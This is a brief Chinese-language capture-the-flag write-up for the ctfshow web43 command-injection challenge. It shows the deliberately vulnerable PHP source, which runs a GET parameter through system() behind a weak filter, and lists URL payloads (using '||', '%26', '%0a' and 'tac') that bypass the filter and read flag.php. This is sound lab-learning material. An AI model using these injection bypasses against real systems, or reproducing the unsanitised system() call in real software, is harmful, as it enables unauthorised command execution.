ctfshow-web43(命令执行)

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:32:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
} 

 过滤了;

?c=ls||
?c=ls%26
?c=ls%0a

过滤了cat

?c=tac flag.php%0a

上一篇:PostgresSQL数据库安装及操作


下一篇:ctfshow-命令执行